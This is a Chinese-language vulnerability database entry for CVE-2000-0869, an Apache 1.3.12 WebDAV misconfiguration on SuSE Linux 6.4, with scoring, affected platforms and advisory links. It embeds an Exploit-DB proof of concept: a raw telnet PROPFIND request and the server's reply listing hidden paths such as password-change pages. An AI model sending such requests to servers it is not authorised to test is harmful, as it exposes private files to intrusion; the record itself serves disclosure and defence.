CVE-2000-0869
CVSS5.0
发布时间 :2000-11-14 00:00:00
修订时间 :2016-09-16 21:59:07
NMCOE    

[原文]The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary directories via the PROPFIND HTTP request method.


[CNNVD]SuSE Linux Apache WebDAV目录遍历漏洞(CNNVD-200011-048)

        SuSE Linux 6.4的Apache 1.3.12默认配置启用WebDAV,远程攻击者可以利用该漏洞借助PROPFIND HTTP请求方法列出任意目录。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:suse:suse_linux:6.1SuSE SuSE Linux 6.1
cpe:/o:suse:suse_linux:6.4::ppc
cpe:/o:suse:suse_linux:7.0SuSE SuSE Linux 7.0
cpe:/o:suse:suse_linux:6.0SuSE SuSE Linux 6.0
cpe:/o:suse:suse_linux:6.4:alphaSuSE SuSE Linux 6.4 alpha
cpe:/o:suse:suse_linux:6.4SuSE SuSE Linux 6.4
cpe:/o:suse:suse_linux:6.1:alphaSuSE SuSE Linux 6.1 alpha
cpe:/a:apache:http_server:1.3.12Apache Software Foundation Apache HTTP Server 1.3.12
cpe:/o:suse:suse_linux:6.3SuSE SuSE Linux 6.3
cpe:/o:suse:suse_linux:6.2SuSE SuSE Linux 6.2
cpe:/o:suse:suse_linux:6.3:alphaSuSE SuSE Linux 6.3 alpha
cpe:/o:suse:suse_linux:6.3::ppc

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0869
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0869
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200011-048
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/linux/suse/2000-q3/0906.html
(VENDOR_ADVISORY)  SUSE  20000907
http://www.atstake.com/research/advisories/2000/a090700-3.txt
(VENDOR_ADVISORY)  ATSTAKE  A090700-3
http://www.securityfocus.com/bid/1656
(VENDOR_ADVISORY)  BID  1656
http://xforce.iss.net/static/5204.php
(UNKNOWN)  XF  apache-webdav-directory-listings

- 漏洞信息

SuSE Linux Apache WebDAV目录遍历漏洞
中危 未知
2000-11-14 00:00:00 2006-08-03 00:00:00
远程  
        SuSE Linux 6.4的Apache 1.3.12默认配置启用WebDAV,远程攻击者可以利用该漏洞借助PROPFIND HTTP请求方法列出任意目录。

- 公告与补丁

        

- 漏洞信息 (20210)

Apache 1.3.12 WebDAV Directory Listings Vulnerability (EDBID:20210)
linux remote
2000-09-07 Verified
0 Mnemonix
N/A [点击下载]
source: http://www.securityfocus.com/bid/1656/info

WebDAV (Web Distributed Authoring and Versioning) is an extension of HTTP which allows users to create, edit and share documents using the HTTP protocol. A particular REQUEST METHOD, PROPFIND, allows users to retrieve resource properties such as displayname, date last modified, and others. Apache web server as installed by SuSE 6.4 has WebDAV enabled for the entire file structure of the server. By making a specific, properly structured request to the Apache web server, it is possible to obtain information which is equivalent to a directory listing.

suse~: # telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
PROPFIND / HTTP/1.1
Host: suse
Content-Type: text/xml
Content-Length: 110

<?xml version="1.0"?>
<a:propfind xmlns:a="DAV:">
<a:prop>
<a:displayname/>
</a:prop>
</a:propfind>

HTTP/1.1 207 Multi-Status
Date: Sun, 20 Aug 2000 17:38:58 GMT
Server: Apache/1.3.12 (Unix) (SuSE/Linux) mod_fastcgi/2.2.2 DAV/0.9.14
mod_perl/1.21 PHP/3.0.15
Transfer-Encoding: chunked
Content-Type: text/xml; charset="utf-8"

dc1
<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response>
<D:href>/secret/secret/sql_tool.shtml</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/secret/secret/change-passwd.shtml</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/secret/secret/add-user.shmtl</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/secret/secret/</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/secret/</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/webalizer/</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/test.php3</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/date.php3</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/linbot/</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/robots.txt</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/index.html</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/gif/u_arrow.gif</D:href>
<D:propstat>
<D:prop>
</D:prop>
..
- ---cut-----		

- 漏洞信息

404
Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
Remote / Network Access Information Disclosure
Loss of Confidentiality Upgrade
Exploit Public Third-party Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2000-09-07 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站